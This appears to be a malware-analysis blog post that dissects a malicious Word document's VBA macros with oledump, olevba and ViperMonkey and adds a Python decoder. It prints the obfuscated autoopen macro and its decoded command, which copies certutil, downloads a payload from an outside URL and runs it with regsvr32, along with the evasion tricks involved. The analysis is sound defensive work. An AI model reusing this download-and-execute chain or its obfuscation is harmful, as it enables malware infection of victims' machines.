In this post, we're going to briefly analyze a malicious Word document. Using a handful of open-source tools, we'll extract IOCs and understand what the malicious code hidden in its macros attempts to do.
General information
Let's get started by listing the data streams within the file with oledump.py (oledump.py malicious.doc). Streams that contain VBA code are flagged with an M in the listing (a lowercase m marks modules that contain only attribute lines).
A first look indicates that there are 3 different macro streams within the malicious document.
Analysis
Manual Extraction
The macro of most interest is the first one found in the streams.
Let's dissect the command run below:
The -s flag selects the data stream
The 3 is the number of the data stream we want to dump
The -S flag performs a strings dump of the stream. VBA source is stored compressed inside the module stream, so strings only surfaces short readable fragments; this is why the output below looks chopped up (use -v instead of -S to decompress the source)
$ oledump.py -s 3 -S malicious.doc
12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77$
cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
Attribut
e VB_Nam
e = "T"
Sub aut
oopen()
dh("1
2%2%11%7`9%64%
7%28%10%
.26%8
6%29%3%73
44%85%51
F0%8
2%43%
94%65
t74%
h\2%
w0%1
7"@y
m XN As
New WshS
hell
.run(
"cmd /c
set u=tu@til&&c
opy C:\W
indows\S
ystem32\
cer%u%.e
Progr
amData\1a
", 0
End
From the extracted strings we can establish the following:
A command is run through cmd.exe
A variable u is set to tutil, so cer%u%.exe expands to certutil.exe; splitting the name this way keeps the literal string "certutil" out of the macro
certutil.exe is copied from the System32 folder to C:\ProgramData\1.exe. At this point nothing is downloaded yet: 1.exe is a renamed copy of a legitimate Windows binary
There is also an interesting and rather odd string of characters that needs further analysis, perhaps via emulation!
12%2%11%79%64%12%79%77%28{...}
The second macro is not much of a macro: its stream does contain VBA, but only attribute statements (this is the empty ThisDocument module, which oledump marks with a lowercase m):
$ oledump.py -s 4 -S malicious.doc
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Spac
Crea
tabl
Pre decla
BExp
Temp
lateDeri
$Custom
(1Normal.ThisDocument
$*\Rffff*08610d3149
The third macro is also quite short compared to the first one, but the fragments Split, "%", UBound, Chr and X(or) in its strings already hint at a decoding routine, most likely the one that turns the odd string above into something runnable:
$ oledump.py -s 10 -S malicious.doc
util'
Attribut
e VB_Nam
e = "d"
Functio
n h(ju)
dSpli
<, "%"
P@For lc
To UBou nd(eR
& Chr
&(lc) X
>Next
}vY(
L"util
Another tool that lets us easily see the contents of the macros embedded in the document is olevba, which extracts and decompresses the VBA source of every module in the file.
This gives us a faster overview of what is happening in the macros and can, where possible, decode and deobfuscate strings within them (--deobf).
Finally, it summarises what is occurring in the different macros and flags suspicious keywords and IOCs found in them.
$ olevba malicious.doc
pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: malicious.doc
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO T.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/T'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
LG = h("12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77")
Dim XN As New WshShell
Call XN.run("cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe", 0)
Call XN.run(LG, 0)
End Sub
-------------------------------------------------------------------------------
VBA MACRO d.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/d'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function h(ju)
eR = Split(ju, "%")
For lc = 0 To UBound(eR)
hh = hh & Chr(eR(lc) Xor 111)
Next lc
h = hh
End Function
Function vY()
vY = "util"
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |autoopen |Runs when the Word document is opened |
|Suspicious|run |May run an executable file or a system |
| | |command |
|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|Windows |May enumerate application windows (if |
| | |combined with Shell.Application object) |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Xor |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |1.exe |Executable file name |
+----------+--------------------+---------------------------------------------+
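With the decoder and the encoded argument both visible in the olevba output, we can decode the string ourselves without an emulator. The following is an added Python example (not code from the original post, and not part of oletools): a port of Function h() from d.bas, plus a small normaliser for the two cmd.exe tricks the sample relies on, caret escapes and the set u=...&&call ... construction, in which the call prefix makes cmd expand %u% a second time after set has run. The encoded blob and the first command line are copied from the T.bas listing above; the normaliser is deliberately minimal and is not a full cmd.exe parser.

```python
import re

# Encoded argument passed to h() in T.bas, copied from the olevba output above.
ENCODED = "12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77"

# First command line run by autoopen in T.bas.
STAGE1 = r"cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe"


def h(ju, key=111, sep="%"):
    """Port of Function h(ju) from d.bas: Split on '%', XOR each number with 111, Chr()."""
    return "".join(chr(int(tok) ^ key) for tok in ju.split(sep))


def normalize_cmd(cmd):
    """Undo the cmd.exe tricks used by this sample: strip 'cmd /c' and outer quotes,
    collect inline 'set VAR=value&&' prefixes, drop caret escapes and expand %VAR%.
    Minimal on purpose; it is not a full cmd.exe parser."""
    cmd = re.sub(r"^cmd\s+/c\s+", "", cmd.strip())
    if len(cmd) >= 2 and cmd[0] == '"' and cmd[-1] == '"':
        cmd = cmd[1:-1]
    env = {}
    while True:
        m = re.match(r"set\s+(\w+)=([^&]*)&&\s*", cmd)
        if not m:
            break
        env[m.group(1).lower()] = m.group(2)
        cmd = cmd[m.end():]
    # '^' escapes the next character; removing it leaves the literal text.
    cmd = cmd.replace("^", "")
    # The 'call' prefix is what makes cmd expand %VAR% after 'set' has run.
    cmd = re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), cmd)
    return cmd


def extract_iocs(cmd):
    """Pull URLs and Windows paths out of a normalised command line."""
    urls = re.findall(r'https?://[^\s"]+', cmd)
    paths = re.findall(r'[A-Za-z]:\\[^\s"&]+', cmd)
    return {"urls": sorted(set(urls)), "paths": sorted(set(paths))}


def analyze():
    """Decode and normalise both stages the way the macro would run them."""
    stage2 = h(ENCODED)
    stages = [normalize_cmd(STAGE1), normalize_cmd(stage2)]
    return {"decoded": stage2, "stages": stages, "iocs": extract_iocs(" ".join(stages))}


if __name__ == "__main__":
    result = analyze()
    print("decoded :", result["decoded"])
    for i, s in enumerate(result["stages"], 1):
        print(f"stage {i} :", s)
    print("iocs    :", result["iocs"])
```

Running it prints the decoded string exactly as ViperMonkey reports it further down, followed by the two normalised stages (copy certutil.exe to 1.exe; 1.exe /urlcache /f <URL> 1.tmp && regsvr32 1.tmp). Defanging the URL and file names before they go into a report is left to the reader.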
VBA Emulation
In some cases, when analyzing documents that contain malicious macros, the best way to know what they do is to make the macros RUN. Of course, that should be done in an isolated environment, such as a sandbox built for analyzing malware or a dedicated virtual machine.
One way to do so without executing anything on a real Windows host is a VBA emulator. The one we will be using is ViperMonkey, which extracts the VBA code with olevba (the same tool we used above), parses it, emulates its execution and reports the actions the code takes, such as running commands, downloading and writing files.
$ vmonkey malicious.doc
_ ___ __ ___ __
| | / (_)___ ___ _____/ |/ /___ ____ / /_____ __ __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ / __/ / / / / / /_/ / / / / ,< / __/ /_/ /
|___/_/ .___/\___/_/ /_/ /_/\____/_/ /_/_/|_|\___/\__, /
/_/ /____/
vmonkey 1.0.3 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: attacker3.doc
INFO Starting emulation...
INFO Emulating an Office (VBA) file.
INFO Reading document metadata...
<output omitted>
WARNING File is not an Excel 97 file. Not reading with xlrd2.
INFO Saving dropped analysis artifacts in .//attacker3.doc_artifacts/
INFO Parsing VB...
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO T.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/T'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
<output omitted>
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Sub autoopen (): 4 statement(s)
-------------------------------------------------------------------------------
VBA MACRO d.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/d'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
<output omitted>
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Function h ([ByRef ju]): 3 statement(s)
INFO parsed Function vY (): 1 statement(s)
INFO Reading document variables...
INFO Reading document comments...
INFO Reading Shapes object text fields...
INFO Reading InlineShapes object text fields...
INFO Reading TextBox and RichEdit object text fields...
INFO Reading custom document properties...
INFO Reading embedded object text fields...
INFO Reading document text and tables...
Traceback (most recent call last):
File "/opt/vipermonkey/lib/python2.7/site-packages/vipermonkey/core/../export_doc_text.py", line 20, in <module>
from unotools import Socket, connect
ModuleNotFoundError: No module named 'unotools'
ERROR Running export_doc_text.py failed. Command '['timeout', '30', 'python3', '/opt/vipermonkey/lib/python2.7/site-packages/vipermonkey/core/../export_doc_text.py', '--text', '-f', '/tmp/tmp_word_file_8096341053']' returned non-zero exit status 1
INFO Reading form variables...
-------------------------------------------------------------------------------
TRACING VBA CODE (entrypoint = Auto*):
INFO Emulating loose statements...
INFO ACTION: Found Entry Point - params 'autoopen' -
INFO evaluating Sub autoopen
INFO calling Function: h('12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63...)
INFO calling Function: Split('12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63...)
INFO calling Function: UBound(['12', '2', '11', '79', '64', '12', '79', '77', '28', '10', '27', '79', '26', '8...)
WARNING Variable 'hh' not found
INFO calling Function: eR(0)
INFO calling Function: eR(1)
<output omitted>
INFO calling Function: eR(79)
INFO Found possible intermediate IOC (URL): 'cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.c'
INFO calling Function: eR(80)
<output omitted>
INFO calling Function: eR(99)
INFO Found possible intermediate IOC (URL): 'cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l='
WARNING Throttling output logging...
INFO Found possible intermediate IOC (URL): 'cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l= ...'
INFO Calling Procedure: XN.run("['cmd /c set u=tutil&&call copy C:\\\\Windows\\\\System32\\\\cer%u%.exe C:\\\\ProgramDat...")
INFO ACTION: XN.run - params ['cmd /c set u=tutil&&call copy C:\\Windows\\System32\\cer%u%.exe C:\\ProgramData\\1.exe', 0] - Interesting Function Call
INFO ACTION: Object.Method Call - params ['cmd /c set u=tutil&&call copy C:\\Windows\\System32\\cer%u%.exe C:\\ProgramData\\1.exe', 0] - XN.run
INFO ACTION: Run - params 'exe' - Interesting Function Call
WARNING Application.Run() failed. Cannot find function exe.
INFO Calling Procedure: XN.run('[\'cmd /c "set u=url&&call C:\\\\ProgramData\\\\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfa...')
INFO ACTION: XN.run - params ['cmd /c "set u=url&&call C:\\ProgramData\\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\\ProgramData\\1.tmp && call regsvr32 C:\\ProgramData\\1.tmp"', 0] - Interesting Function Call
INFO ACTION: Object.Method Call - params ['cmd /c "set u=url&&call C:\\ProgramData\\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\\ProgramData\\1.tmp && call regsvr32 C:\\ProgramData\\1.tmp"', 0] - XN.run
INFO ACTION: Run - params 'tmp"' - Interesting Function Call
WARNING Application.Run() failed. Cannot find function tmp".
Recorded Actions:
+--------------------+---------------------------+---------------------------+
| Action | Parameters | Description |
+--------------------+---------------------------+---------------------------+
| Found Entry Point | autoopen | |
| XN.run | ['cmd /c set | Interesting Function Call |
| | u=tutil&&call copy C:\\Wi | |
| | ndows\\System32\\cer%u%.e | |
| | xe | |
| | C:\\ProgramData\\1.exe', | |
| | 0] | |
| Object.Method Call | ['cmd /c set | XN.run |
| | u=tutil&&call copy C:\\Wi | |
| | ndows\\System32\\cer%u%.e | |
| | xe | |
| | C:\\ProgramData\\1.exe', | |
| | 0] | |
| Run | exe | Interesting Function Call |
| XN.run | ['cmd /c "set u=url&&call | Interesting Function Call |
| | C:\\ProgramData\\1.exe | |
| | /%u%^c^a^c^h^e^ /f^ http: | |
| | //8cfayv.com/bolb/jaent.p | |
| | hp?l=liut6.cab | |
| | C:\\ProgramData\\1.tmp && | |
| | call regsvr32 | |
| | C:\\ProgramData\\1.tmp"', | |
| | 0] | |
| Object.Method Call | ['cmd /c "set u=url&&call | XN.run |
| | C:\\ProgramData\\1.exe | |
| | /%u%^c^a^c^h^e^ /f^ http: | |
| | //8cfayv.com/bolb/jaent.p | |
| | hp?l=liut6.cab | |
| | C:\\ProgramData\\1.tmp && | |
| | call regsvr32 | |
| | C:\\ProgramData\\1.tmp"', | |
| | 0] | |
| Run | tmp" | Interesting Function Call |
+--------------------+---------------------------+---------------------------+
INFO Found 1 possible IOCs. Stripping duplicates...
VBA Builtins Called: ['Chr', 'Split', 'UBound']
Finished analyzing attacker3.doc .
Findings
The document contains three macro modules. Module T (stream 3) holds the autoopen entry point that performs the malicious activity, module d (stream 10) holds the XOR decoder it relies on (each %-separated number is XORed with 111), and ThisDocument is empty.
autoopen first copies the legitimate C:\Windows\System32\certutil.exe to C:\ProgramData\1.exe, building the name from cer%u%.exe with u=tutil so the word certutil never appears in the macro.
The decoded second command uses that copy as a downloader: 1.exe /urlcache /f hxxp://8cfayv[.]com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp (the carets and the set u=url&&call ... trick only hide the string urlcache from the command line).
The downloaded file C:\ProgramData\1.tmp is then executed with regsvr32, i.e. it is loaded as a DLL despite its extension.
IOCs: the URL above, C:\ProgramData\1.exe (a renamed certutil.exe, not malware itself) and C:\ProgramData\1.tmp (the actual payload).